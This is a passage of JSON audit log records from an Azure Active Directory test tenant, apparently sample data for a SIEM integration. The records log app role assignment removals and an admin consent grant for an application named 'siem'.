"a385881d-d5e8-47b0-83ea-d50d6c9906e4"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, 
{"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": 
"AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": 
"ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": 
"restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": 
"ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 
"[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": 
"User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": 
"env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], 
"ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": 
"correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3393756Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118027"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "0031778a-80cf-49f8-aea2-f798c9bf1ec9"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 
